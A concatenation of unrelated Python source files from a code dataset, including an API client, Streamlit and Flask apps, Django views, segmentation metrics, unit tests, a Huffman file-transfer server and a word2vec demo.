search term you want to filter\n :return:\n FireflyResponse: Contains mapping of suggested wisdoms for the user.\n \"\"\"\n requestor = APIRequestor()\n url = 'suggestions'\n response = requestor.get(url, api_key=api_key)['result']\n if search_term:\n response = [d for d in response if str(d['name']).find(search_term) != -1]\n return response\n\n @classmethod\n def get_wisdom(cls, id: int, api_key: str = None) -> FireflyResponse:\n \"\"\"\n Gets the wisdom data for the user by its ID\n\n Args:\n id (int): wisdom (foresight) ID.\n api_key (Optional[str]): Explicit `api_key`, not required, if `Whatify.login()` was run prior.\n\n Returns:\n FireflyResponse: Contains wisdom data by ID for the user.\n \"\"\"\n requestor = APIRequestor()\n url = '{prefix}/{id}'.format(prefix=cls._CLASS_PREFIX, id=id)\n response = requestor.get(url, api_key=api_key)\n return response\n\n @classmethod\n def delete_wisdom(cls, id: int, api_key: str = None) -> FireflyResponse:\n \"\"\"\n Deletes a specific Wisdom.\n\n Args:\n id (int): Wisdom ID.\n api_key (Optional[str]): Explicit `api_key`, not required, if `Whatify.login()` was run prior.\n\n Returns:\n FireflyResponse: \"true\" if deleted successfully, raises WhatifyClientError otherwise.\n \"\"\"\n return cls._delete(id, api_key)\n\n @classmethod\n def create_wisdom(cls, name: str, user_id: int, template_id: int, user_input: str, status: str = None,\n email_client: str = None, is_internal_user: bool = None, foresight_limit: int = None,\n producer: str = None, user_context: str = None, users_in_account: str = None,\n logger: str = None, api_key: str = None) -> FireflyResponse:\n \"\"\"\n Create Wisdom for current user\n\n :param name:\n :param user_id:\n :param template_id:\n :param user_input:\n :return:\n FireflyResponse: Wisdom ID, if successful\n \"\"\"\n data = {\n \"name\": name,\n \"user_input\": json.dumps(user_input),\n \"user_id\": user_id,\n \"template_id\": template_id\n }\n\n requestor = APIRequestor()\n response = requestor.post(url=cls._CLASS_PREFIX, params=data, api_key=api_key)\n # response = requestor.post(url=cls._CLASS_PREFIX, body=data, api_key=api_key)\n return response['id']\n\n @classmethod\n def update_wisdom(cls, id: int, data: str, api_key: str = None) -> FireflyResponse:\n \"\"\"\n Update wisdom with the given data\n\n :param id:\n :param data:\n :param api_key:\n :return:\n \"\"\"\n\n requestor = 
APIRequestor()\n url = '{prefix}/{id}'.format(prefix=cls._CLASS_PREFIX, id=id)\n response = requestor.patch(url=url, params=data, api_key=api_key)\n return response\n\n\n\n","sub_path":"fireflyai/resources/wisdom.py","file_name":"wisdom.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23812722","text":"# # https://docs.streamlit.io/library/get-started/create-an-app\n\n# import streamlit as st\n# import pandas as pd\n# import numpy as np\n\n# st.title('Uber pickups in NYC')\n\n\n# DATE_COLUMN = 'date/time'\n# DATA_URL = ('https://s3-us-west-2.amazonaws.com/'\n# 'streamlit-demo-data/uber-raw-data-sep14.csv.gz')\n\n# def load_data(nrows):\n# data = pd.read_csv(DATA_URL, nrows=nrows)\n# lowercase = lambda x: str(x).lower()\n# data.rename(lowercase, axis='columns', inplace=True)\n# data[DATE_COLUMN] = pd.to_datetime(data[DATE_COLUMN])\n# return data\n\n# # Create a text element and let the reader know the data is loading.\n# data_load_state = st.text('Loading data...')\n# # Load 10,000 rows of data into the dataframe.\n# data = load_data(10000)\n# # Notify the reader that the data was successfully loaded.\n# data_load_state.text('Loading data...done!')\n\n\nfrom vega_datasets import data\nimport streamlit as st\nimport altair as alt\n\ndef main():\n df = load_data()\n page = st.sidebar.selectbox(\"Choose a page\", [\"Homepage\", \"Exploration\"])\n\n if page == \"Homepage\":\n st.header(\"This is your data explorer.\")\n st.write(\"Please select a page on the left.\")\n st.write(df)\n elif page == \"Exploration\":\n st.title(\"Data Exploration\")\n x_axis = st.selectbox(\"Choose a variable for the x-axis\", df.columns, index=3)\n y_axis = st.selectbox(\"Choose a variable for the y-axis\", df.columns, index=4)\n visualize_data(df, x_axis, y_axis)\n\n@st.cache\ndef load_data():\n df = data.cars()\n return df\n\ndef visualize_data(df, x_axis, y_axis):\n graph = alt.Chart(df).mark_circle(size=60).encode(\n x=x_axis,\n y=y_axis,\n color='Origin',\n tooltip=['Name', 'Origin', 'Horsepower', 'Miles_per_Gallon']\n ).interactive()\n\n st.write(graph)\n\nif __name__ == \"__main__\":\n main()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460333854","text":"#modell.py\n\nimport uuid\n\nclass Modell:\n\tdef __init__(self, controller):\n\t\tself.controller = controller\n\t\t\n\t\tself.items = dict()\n\n\t\tself.items[uuid.uuid4()] = \"krasser\"\n\t\tself.items[uuid.uuid4()] = \"shit\"\n\t\tself.items[uuid.uuid4()] = \"mehr noch...\"\n\t\t\n\t\tkey_list = list(self.items.keys())\n\t\tself.root = Node(\"root_node\", key_list[0])\t\t\n\t\tself.root.add_child(Node(\"child1\", key_list[1]))\n\t\tself.root.add_child(Node(\"child2=child1\", key_list[1]))\n\t\tself.root.add_child(Node(\"alter\", key_list[2]))\n\t\ttt = self.root.add_child(Node(\"4rl-o'rly?\", key_list[2]))\n\t\ttt.add_child(Node(\"haya\", key_list[0]))\n\n\tdef get_root(self):\n\t\treturn self.root\n\t\t\n\tdef get_text(self, item):\n\t\tif item:\n\t\t\tfound_item = None\n\t\t\tfound_item = self.root.find_child(item)\n\n\t\t\tif found_item:\n\t\t\t\treturn str(self.items[found_item.data])\n\n\t\treturn None\n\n\tdef set_text(self, item, text):\n\t\tif item:\n\t\t\tfound_item = None\n\t\t\tfound_item = self.root.find_child(item)\n\n\t\t\tif found_item:\n\t\t\t\tself.items[found_item.data] = text\n\nclass 
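The Streamlit demo above memoizes `load_data` with `@st.cache` so the cars dataset is fetched once per session instead of on every widget-triggered rerun. A trimmed sketch of the same cache-then-select pattern; it assumes `streamlit` and `pandas` are installed, and note that `@st.cache` matches the Streamlit version the snippet targets while newer releases spell it `@st.cache_data`:

```python
import pandas as pd
import streamlit as st

@st.cache  # newer Streamlit versions use @st.cache_data instead
def load_data() -> pd.DataFrame:
    # Expensive work runs once; reruns triggered by widgets hit the cache.
    return pd.DataFrame({"x": range(100), "y": [v * v for v in range(100)]})

df = load_data()
column = st.selectbox("Column", df.columns)  # changing this does not reload df
st.line_chart(df[column])
```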
Node:\n\tdef __init__(self, name, data):\n\t\tself.uid = uuid.uuid4()\n\t\tself.children = list()\n\t\tself.name = name\n\t\tself.data = data\n\t\n\tdef add_child(self, child_node):\n\t\tself.children.append(child_node)\n\t\tprint(self.name, \"is now parent of\", child_node.name)\n\t\treturn child_node\n\n\tdef find_child(self, uid):\n\t\tif self.uid == uid:\n\t\t\treturn self\n\t\t\n\t\tchild_found = None\n\t\t\n\t\tfor child in self.children:\n\t\t\tchild_found = child.find_child(uid)\n\t\t\t\n\t\t\tif child_found:\n\t\t\t\treturn child_found\n\t\t\t\t\n\t\treturn None\n\t\t\n","sub_path":"modell.py","file_name":"modell.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"219279755","text":"\"\"\"attendance URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nimport diary.views as dry \n\nadmin.site.site_title = 'Attendance Admin'\nadmin.site.site_header = 'Attendance Management System'\nadmin.site.index_title = 'Attendance Administration'\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', dry.home),\n path('student-stats/', dry.StatbyRoll),\n path('paper-stats/', dry.StatByPaper),\n path('student/', dry.StatStudent),\n path('paper/', dry.StatPaper),\n path('datestat/', dry.statbyDate),\n path('allstat/', dry.statAll),\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)","sub_path":"attendance/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"254699786","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 14:41:11 2020\n\n@author: jiaqiwang0301@win.tu-berlin.de\n\"\"\"\n\nimport numpy as np\nimport utils.training_crack as train_utils\nfrom sklearn.metrics import confusion_matrix\nimport cv2\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\ndef calculate_confusion_matrix(targets,preds,cls_num,t=5):\n '''\n claculate confusion matrix for only two class!!!!\n !!! 
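`Node.find_child` above is a depth-first search by uid: it returns the first matching node anywhere in the subtree, or `None` on a miss. A stand-alone usage sketch with a trimmed copy of the class (the uuid keys here are generated for illustration):

```python
# Depth-first search by uid, mirroring Node.find_child above.
import uuid

class Node:
    def __init__(self, name):
        self.uid = uuid.uuid4()
        self.name = name
        self.children = []

    def find_child(self, uid):
        if self.uid == uid:
            return self          # match at this node
        for child in self.children:
            found = child.find_child(uid)
            if found:
                return found     # first hit anywhere in the subtree wins
        return None

root = Node("root")
leaf = Node("leaf")
root.children.append(leaf)
assert root.find_child(leaf.uid) is leaf       # hit deep in the tree
assert root.find_child(uuid.uuid4()) is None   # miss returns None
```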
for batch..it also works..I think\n input:\n targets: tensor ground truth\n preds: tensor predicted value\n t: tolerance margin\n '''\n pre = preds\n gt = targets\n# targets = targets.data.cpu().numpy().flatten('C')\n# preds = preds.data.cpu().numpy().flatten('C')\n \n c_matrix = confusion_matrix(gt.flatten('C'), pre.flatten('C'),labels=np.arange(cls_num))\n b,w,h = gt.shape\n r = []\n for k in range(b):\n num = 0\n for i in range(w):\n for j in range(h):\n if pre[k,i,j] == 1 :\n c = gt[k,max(0,i-t):min(w,i+t+1),max(0,j-t):min(h,j+t+1)]\n if c[c==1].sum() > 1:\n num += 1\n r.append(num)\n \n c_matrix[0,1] = c_matrix[0,1] - (sum(r) - c_matrix[1,1])\n c_matrix[1,1] = sum(r)\n\n return c_matrix\n\ntargets = (np.load('output/ts.npy')[0,:,:])\npreds = (np.load('output/pred.npy')[0,:,:])/5\n\n\nt = 5 # tolerance margin\ndef generation_TP_FP_FN(targets,preds,t = 5):\n TP = np.zeros_like(targets)\n FP = np.zeros_like(targets)\n FN = np.zeros_like(targets)\n w,h = preds.shape\n for i in range(w):\n for j in range(h):\n if preds[i,j] == 1 :\n \n c = targets[max(0,i-t):min(w,i+t+1),max(0,j-t):min(h,j+t+1)]\n if c[c==1].sum() > 1:\n TP[i,j] = 1\n else:\n FP[i,j] = 1\n else:\n if targets[i,j] == 1:\n FN[i,j] = 1\n return TP, FP, FN\n\n#cm = calculate_confusion_matrix(targets[None,:,:],preds[None,:,:],2,t=5)\n#print(cm)\n\nTP, FP, FN = generation_TP_FP_FN(targets,preds,t = 5)\nprint(TP.sum(),FP.sum(),FN.sum())\nw, h = FN.shape\nimg = np.ones([w,h,3])*255\ndef draw_color(img,TP,color):\n ind = TP==1\n img1 = img[:,:,0]\n img2 = img[:,:,1]\n img3 = img[:,:,2]\n img1[ind] = color[0]\n img2[ind] = color[1]\n img3[ind] = color[2]\n return np.stack((img1,img2,img3),axis=-1)\n\nimg = draw_color(img,TP,[255,0,0])\nimg = draw_color(img,FP,[0,255,0])\nimg = draw_color(img,FN,[0,0,255])\n\npath = 'SegNet-Tutorial/CamVid/CFD/aug/aug2_180/images/112.jpg'\nimage_original = np.array(Image.open(path)).astype(np.float32)\n\nw_img = 0.8\nw_label = 0.2 \nimg = img.astype(np.float32) \nimage_merged = cv2.addWeighted(image_original,w_img,img,w_label,0,dtype = cv2.CV_32F) \n\nplt.figure()\nplt.imshow(img) \n \n\n \n\n \n\n\n","sub_path":"utils/previous/color_test_delete_later.py","file_name":"color_test_delete_later.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"631435000","text":"import numpy as np\nimport unittest\nfrom py.py import PyCUMSUM, cumsum\nfrom cpp.cpp import CppCUMSUM\nfrom R.R import RCUMSUM\n#\"\"\"\n\n\nclass TestPyCUMSUM(unittest.TestCase):\n def test_intsample(self):\n seq = [1, 2, 3, 4, 5]\n ex = [1, 3, 6, 10, 15]\n PyC = PyCUMSUM(seq)\n self.assertEqual(ex, PyC.cumsum)\n self.assertEqual(ex, cumsum(seq))\n\n def test_np(self):\n r = np.random.RandomState(0)\n cases = 10\n length = 100\n for dummy_iterator in range(cases):\n seq = r.randn(length)\n PyC = PyCUMSUM(seq)\n NpC = np.cumsum(seq)\n pyc = cumsum(seq)\n for Py, py, Np in zip(PyC.cumsum, pyc, NpC):\n self.assertAlmostEqual(Np, Py, places=10)\n self.assertAlmostEqual(Np, py, places=10)\n\n def test_cpp(self):\n r = np.random.RandomState(0)\n cases = 10\n length = 100\n for dummy_iterator in range(cases):\n seq = r.randn(length)\n PyC = PyCUMSUM(seq)\n CppC = CppCUMSUM(seq)\n pyc = cumsum(seq)\n for Py, py, Cpp in zip(PyC.cumsum, pyc, CppC.cumsum):\n self.assertAlmostEqual(Cpp, Py, places=10)\n self.assertAlmostEqual(Cpp, py, places=10)\n\n def test_R(self):\n r = np.random.RandomState(0)\n cases = 10\n length = 100\n for dummy_iterator in 
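The tolerant confusion-matrix code above scans a (2t+1)×(2t+1) window around every predicted crack pixel in Python loops, which is O(w·h·t²). A hedged alternative sketch, not the author's method: dilating the ground truth by the tolerance margin turns the window test into one elementwise comparison. It assumes binary {0,1} masks, and note one subtle difference: the original requires more than one true pixel in the window (`c[c==1].sum() > 1`), while dilation accepts a single one, so counts can differ at crack endpoints.

```python
import numpy as np
import cv2

def tolerant_tp_fp_fn(target: np.ndarray, pred: np.ndarray, t: int = 5):
    """Vectorized variant of the windowed TP/FP/FN test above.

    Dilating the ground truth by (2t+1) makes "a true pixel exists within
    t pixels" a plain elementwise check. Assumes binary uint8 masks.
    """
    kernel = np.ones((2 * t + 1, 2 * t + 1), np.uint8)
    target_dilated = cv2.dilate(target.astype(np.uint8), kernel)
    tp = (pred == 1) & (target_dilated == 1)   # predicted, near a true pixel
    fp = (pred == 1) & (target_dilated == 0)   # predicted, nothing nearby
    fn = (pred == 0) & (target == 1)           # true pixel that was missed
    return tp.astype(np.uint8), fp.astype(np.uint8), fn.astype(np.uint8)
```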
range(cases):\n seq = r.randn(length)\n PyC = PyCUMSUM(seq)\n RC = RCUMSUM(seq)\n pyc = cumsum(seq)\n for Py, py, R in zip(PyC.cumsum, pyc, RC.cumsum):\n self.assertAlmostEqual(R, Py, places=10)\n self.assertAlmostEqual(R, py, places=10)\n\n\nclass TestCppCUMSUM(unittest.TestCase):\n def test_intsample(self):\n seq = [1, 2, 3, 4, 5]\n ex = [1, 3, 6, 10, 15]\n CppC = CppCUMSUM(seq)\n self.assertEqual(ex, CppC.cumsum)\n\n def test_npcumsum(self):\n cases = 10\n length = 100\n r = np.random.RandomState(0)\n for dummy_iterator in range(cases):\n seq = r.randn(length)\n CppC = PyCUMSUM(seq)\n NpC = np.cumsum(seq)\n for Cpp, Np in zip(CppC.cumsum, NpC):\n self.assertAlmostEqual(Np, Cpp, places=10)\n\n\nclass TestRCUMSUM(unittest.TestCase):\n def test_intsample(self):\n seq = [1, 2, 3, 4, 5]\n ex = [1, 3, 6, 10, 15]\n RC = RCUMSUM(seq)\n self.assertEqual(ex, RC.cumsum)\n\n def test_npcumsum(self):\n cases = 10\n length = 100\n r = np.random.RandomState(0)\n for dummy_iterator in range(cases):\n seq = r.randn(length)\n RC = RCUMSUM(seq)\n NpC = np.cumsum(seq)\n for R, Np in zip(RC.cumsum, NpC):\n self.assertAlmostEqual(Np, R, places=10)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Unittest.py","file_name":"Unittest.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"435863565","text":"import socket\nimport huffman\n\nPORT=9009\nIP=''\nconn=(IP,PORT)\n\nif __name__ == \"__main__\":\n\n\ts=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ts.bind(conn)\n\ts.listen(5)\n\tc,addr=s.accept()\n\n\tfilename=c.recv(10).decode(\"utf-8\")\n\ttry:\n\t\tfile=open(filename,\"rb\")\n\texcept FileNotFoundError:\n\t\tprint(\"file '%s' not found\"%filename)\n\t\tc.send(\"0\".encode(\"utf-8\"))\n\t\tquit()\n\tc.send(\"1\".encode(\"utf-8\"))\n\tfile.close()\n\n\thuff=huffman.Huffman(filename)\n\thuff.encode(\"a.huff\")\n\n\tfile=open(\"a.huff\",\"rb\")\n\tdata=file.read(1024)\n\twhile data:\n\t\tc.send(data)\n\t\tdata=file.read(1024) \n\tc.send(data)\n\n\tfile.close()\n\tc.close()","sub_path":"huffman/variable_length/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"364537546","text":"import os\n\nimport gensim.downloader as api\nfrom gensim.models import Word2Vec, KeyedVectors\n\nif __name__ == '__main__':\n bin_file_path = 'data/text8-word2vec.bin'\n\n if not os.path.exists(bin_file_path):\n dataset = api.load('text8')\n model = Word2Vec(dataset)\n os.makedirs('data', exist_ok=True)\n model.save(bin_file_path)\n\n model = KeyedVectors.load(bin_file_path)\n\n vec_song = model.wv['song']\n print(vec_song)\n vec_song_2 = model.wv.word_vec('song')\n print(vec_song_2)\n","sub_path":"2020/09/20200905_Word2Vec_word_vector/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600644152","text":"\ndef main():\n import argparse\n\n from .Image import Image\n from .Video import Video\n from .Live import Live\n\n parser = argparse.ArgumentParser(\n prog='to-ascii',\n description='A tool which can convert videos, images, gifs, and even live video to ascii art!'\n )\n\n # cli args\n parser.add_argument('-t', '--type', type=str, choices=['image', 'video', 'live'], dest='filetype', help='The type of file', action='store', required=True)\n parser.add_argument('-f', 
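The word2vec snippet above trains on text8, caches the model, and reads single word vectors. The usual follow-up queries are nearest neighbours and pairwise similarity; a hedged sketch assuming the same `data/text8-word2vec.bin` file produced by that script:

```python
from gensim.models import KeyedVectors

# Assumes the 'data/text8-word2vec.bin' file saved by the snippet above.
model = KeyedVectors.load('data/text8-word2vec.bin')

# Nearest neighbours in the embedding space, best first:
for word, score in model.wv.most_similar('song', topn=5):
    print(f'{word}: {score:.3f}')

# Pairwise cosine similarity between two words:
print(model.wv.similarity('song', 'music'))
```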
'--file', type=str, dest='filename', help='The name of the file to convert', action='store', required=True)\n parser.add_argument('-s', '--scale', type=float, dest='scale', default=.1, help='The scale of the final dimensions', action='store')\n parser.add_argument('-w', '--width-stretch', type=float, dest='width_stretch', default=2, help='Scale which only applies to the width', action='store')\n parser.add_argument('-g', '--gradient', type=str, dest='gradient', default='0', help='The gradient pattern which will be used', action='store')\n parser.add_argument('-r', '--fps', type=int, dest='fps', default=30, help='The FPS cap which will be used when viewing video and live video', action='store')\n\n args = parser.parse_args()\n\n try: # attempt to make gradient an integer if the gradient was supposed to be an index\n args.gradient = int(args.gradient)\n except ValueError:\n pass\n\n if args.filetype == 'live':\n try:\n source = int(args.filename)\n except ValueError:\n source = 0\n\n l = Live(source, scale=args.scale, w_stretch=args.width_stretch, gradient=args.gradient, fps=args.fps, verbose=True)\n\n try:\n l.view()\n except KeyboardInterrupt:\n return\n except Exception as e:\n print(f'ERROR (Please report this!): {e}')\n return\n return\n\n elif args.filetype == 'video':\n c = Video(args.filename, scale=args.scale, w_stretch=args.width_stretch, gradient=args.gradient, verbose=True)\n else:\n c = Image(args.filename, scale=args.scale, w_stretch=args.width_stretch, gradient=args.gradient, verbose=True)\n\n try:\n c.convert()\n if args.filetype == 'video':\n c.view(args.fps)\n else:\n c.view()\n except KeyboardInterrupt:\n print('Exiting...')\n\nif __name__ == '__main__':\n main()\n","sub_path":"toascii/CLI.py","file_name":"CLI.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"184016980","text":"#####INCLUDE PATHS\n#####################################\ndef makeIncludePathsList():\n\tinclude_paths_list = [\n\t'#',\n\t'boost_include_path',\n\t'opencl_include_path']\n\treturn include_paths_list\n#################################\n\n#LIBRARIES - ADJUST NAMES\n#################################\ndef makeLibsNamesList():\n\tlib_names_list = [\n\t'boost_program_options',\n\t'boost_filesystem', \n\t'boost_system', \n\t'boost_unit_test_framework',\n\t'OpenCL']\n\treturn lib_names_list\n#################################\n#LIBRARIES - ADJUST PATHS\n#################################\ndef makeLibPathList():\n\tlib_path_list = [\n\t'boost_lib_path', \n\t'opencl_lib_path']\n\treturn lib_path_list\n#####################################\n####\n###SOURCEFILES\n##########################\ndef programSources():\n\tsource_files = [\n\t'main.cpp', \n\t'EnvCL2.cpp',\n\t'ExternalProgram.cpp',\n\t'FileIn.cpp',\n\t'FileOut.cpp',\n\t'Config.cpp',\n 'DataProxy.cpp']\n\treturn source_files\n\t\ndef testSources():\n\tsource_files = [\n\t'main_test.cpp', \n\t'Config.cpp']\n\treturn source_files\n#SOURCEFILES\n######################\n\n####################################\n##EXAMPLE - FEDORA PC Libraries linkage paths\n##JAKUB KUREK\n###INCLUDE PATHS\n###################################\n#def makeIncludePathsList():\n#\tinclude_paths_list = [\n#\t'#',\n#\t'/usr/local/include',\n#\t'/usr/local/cuda/include']\n#\treturn include_paths_list\n###################################\n\n###LIBRARIES - ADJUST NAMES\n###################################\n#def makeLibsNamesList():\n#\tlib_names_list = 
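The to-ascii CLI above wires everything through `argparse`. Worth knowing when testing such a tool: `parse_args` accepts an explicit argv list, so flag handling can be exercised without a shell. A sketch with a trimmed stand-in for the real parser:

```python
import argparse

# Trimmed stand-in for the to-ascii parser above, to show flag handling.
parser = argparse.ArgumentParser(prog='to-ascii')
parser.add_argument('-t', '--type', choices=['image', 'video', 'live'],
                    dest='filetype', required=True)
parser.add_argument('-f', '--file', dest='filename', required=True)
parser.add_argument('-s', '--scale', type=float, default=.1)

# parse_args takes an explicit argv list, so no shell invocation is needed:
args = parser.parse_args(['-t', 'image', '-f', 'cat.png', '-s', '0.25'])
assert args.filetype == 'image' and args.scale == 0.25
```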
[\n#\t'boost_program_options',\n#\t'boost_filesystem', \n#\t'boost_system', \n#\t'boost_unit_test_framework',\n#\t'OpenCL']\n#\treturn lib_names_list\n###################################\n\n###LIBRARIES - ADJUST PATHS\n###################################\n#def makeLibPathList():\n#\tlib_path_list = [\n#\t'/usr/local/lib', \n#\t'/user/lib']\n#\treturn lib_path_list\n###################################\n\n##################################\n##EXAMPLE - WINDOWS 10 PC Libraries linkage paths\n##JAKUB KUREK\n\n##INCLUDE PATHS\n###########################\n##def makeIncludePathsList():\n## include_paths_list = [\n## '#',\n## 'E:\\\\BibliotekiProgramistyczne\\\\Cpp\\\\boost_1_62_0',\n## 'E:\\\\BibliotekiProgramistyczne\\\\CUDA\\\\Toolkit\\\\include']\n## return include_paths_list\n#################################\n##\n####LIBRARIES - ADJUST NAMES\n#################################\n##def makeLibsNamesList():\n## lib_names_list = [\n## 'boost_program_options-vc140-mt-1_62.lib',\n## 'boost_filesystem-vc140-mt-1_62.lib', \n## 'boost_system-vc140-mt-1_62.lib', \n## 'boost_unit_test_framework-vc140-mt-1_62.lib',\n##\t\t'OpenCL.lib'\n##\t\t]\n## return lib_names_list\n#################################\n##\n####LIBRARIES - ADJUST PATHS\n#################################\n##def makeLibPathList():\n## lib_path_list = [\n## 'E:\\\\BibliotekiProgramistyczne\\\\Cpp\\\\boost_1_62_0\\\\lib64-msvc-14.0', \n## 'E:\\\\BibliotekiProgramistyczne\\\\CUDA\\\\Toolkit\\\\lib\\\\x64']\n## return lib_path_list\n###############################\n","sub_path":"libpaths.py","file_name":"libpaths.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"557549671","text":"import os\nhandler_path=os.path.dirname(os.path.abspath(__file__))+\"\\\\..\\\\Handler\"\n\nimport sys\nsys.path.append(handler_path)\nfrom EnvironmentHandler import *\n\n#from script.Controler.CommonControler import *\n#from CommonHandler import *\nfrom flask import render_template, url_for, redirect,request\nfrom flaskapp import flask_app\nfrom script.Form.forms import QueryForm,TlaForm\nfrom script.Log.log import logging,log_stub,add_log_at_begin_and_end\n\n\n\n\n@flask_app.route(\"/environment_query\",methods=[\"GET\",\"POST\"])\ndef environment_query():\n tlas=GetTlaList()\n\n if request.method=='GET':\n result=request.args\n return render_template(\"./environment_query.html\",tlas=tlas,rows=[])\n \n else:\n result=request.form\n \n #return render_template(\"show_request.html\",result=result,method=request.method) \n \n \n \n if \"query\" in result.keys():\n if \"tla\" in result.keys() and \"deployment_type\" in result.keys():\n tla=result[\"tla\"].strip().upper()\n deployment_type=result[\"deployment_type\"].strip().upper()\n rows=query_environment_unique(tla,deployment_type)\n\n else:\n rows=[]\n return render_template(\"environment_query.html\", tlas=tlas, rows=rows)\n elif \"query_all\" in result.keys():\n if \"tla\" in result.keys():\n tla=result[\"tla\"].strip().upper().replace(\"*\",\"%\")\n if tla == \"\":\n tla = \"%\"\n rows=query_environment_by_tla(tla)\n return render_template(\"environment_query.html\",tlas=tlas,rows=rows)\n\n\n elif \"addnew\" in result.keys():\n row = create_environment_instance()\n return render_template(\"environment_query.html\", row=row,opt=\"AddNew\")\n #return redirect(\"tla_update.html\", form=tla_form, row=row,opt=\"AddNew\")\n\n elif \"modify\" in result.keys() or \"remove\" in result.keys():\n row = 
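libpaths.py above centralizes include paths, library names, and library search paths as plain Python lists. A hedged sketch of how a hypothetical SConstruct might consume them; `Environment` and `Program` are standard SCons builtins injected when the file runs under `scons`, and the placeholder path strings are the file's own and must be replaced per machine:

```python
# Hypothetical SConstruct consuming the lists defined in libpaths.py above.
# Environment/Program are provided by SCons at build time, so this file is
# meant to be run via `scons`, not plain python.
import libpaths

env = Environment(
    CPPPATH=libpaths.makeIncludePathsList(),   # -I search paths
    LIBS=libpaths.makeLibsNamesList(),         # libraries to link
    LIBPATH=libpaths.makeLibPathList(),        # -L search paths
)
env.Program(target='app', source=libpaths.programSources())
```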
create_environment_instance()\n #return render_template(\"show_request.html\",result=result,method=request.method)\n row.id = result[\"id\"]\n row.tla = result[\"tla\"]\n row.deployment_type = result[\"deployment_type\"]\n row.server_type = result[\"server_type\"]\n row.server_machine = result[\"server_machine\"]\n row.terminal_machine = result[\"terminal_machine\"]\n row.comment = result[\"comment\"]\n row.monitored_by = result[\"monitored_by\"]\n row.enabled = result[\"enabled\"]\n row.key_words = result[\"key_words\"]\n row.is_compliance = result[\"is_compliance\"]\n\n if \"modify\" in result.keys():\n opt=\"Modify\"\n\n if \"remove\" in result.keys():\n opt=\"Remove\"\n\n return render_template(\"environment_update.html\", row=row,opt=opt)\n\n else:\n return render_template(\"show_request.html\", result=result, method=request.method)\n\n\n@flask_app.route(\"/environment_update\",methods=[\"GET\",\"POST\"])\ndef environment_update():\n tlas = GetTlaList()\n if request.method=='GET':\n result=request.args \n else:\n result=request.form\n\n\n if \"modify_update\" in result.keys() or \"addnew_update\" in result.keys():\n\n #return render_template(\"show_request.html\",result=result,method=request.method)\n if \"modify_update\" in result.keys():\n environment_id = result[\"id\"].strip()\n row = query_environment_by_id(environment_id)\n\n if \"addnew_update\" in result.keys():\n row = create_tla_instance()\n\n row.tla = result[\"tla\"]\n row.deployment_type = result[\"deployment_type\"]\n row.server_type = result[\"server_type\"]\n row.server_machine = result[\"server_machine\"]\n row.terminal_machine = result[\"terminal_machine\"]\n row.comment = result[\"comment\"]\n row.monitored_by = result[\"monitored_by\"]\n row.enabled = result[\"enabled\"]\n row.key_words = result[\"key_words\"]\n row.is_compliance = result[\"is_compliance\"]\n\n if \"modify_update\" in result.keys():\n update_environment(row)\n if \"addnew_update\" in result.keys():\n add_environment(row)\n\n return render_template(\"environment_query.html\",tlas=tlas,rows=[row])\n\n elif \"remove_update\" in result.keys():\n environment_id = result[\"id\"].strip()\n remove_environment_by_id(environment_id)\n return render_template(\"environment_query.html\", tlas=tlas,rows=[])\n\n elif \"cancel\" in result.keys():\n return render_template(\"environment_query.html\", tlas=tlas,rows=[])\n\n else:\n return render_template(\"show_request.html\", result=result, method=request.method)\n \n \n","sub_path":"script/Controler/EnvironmentControler.py","file_name":"EnvironmentControler.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384613173","text":"from django.shortcuts import get_object_or_404, render\nfrom .models import Post, Category\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponseRedirect\nimport re\nfrom haystack.forms import SearchForm\nfrom taggit.models import Tag\n\ndef index(request):\n\n title = \"Nick Congleton | Blog\"\n metadesc = \"Nick Congleton's blog providing news, information, and guides on topic ranging from freelance writing to technology, programming, and gaming.\"\n page = request.GET.get('page')\n cat = request.GET.get('cat')\n search_form = SearchForm(request.POST or None)\n if cat:\n post_list= Paginator((Post.objects.filter(categories__name__in=[cat]).order_by('-date')), 10)\n else:\n post_list = 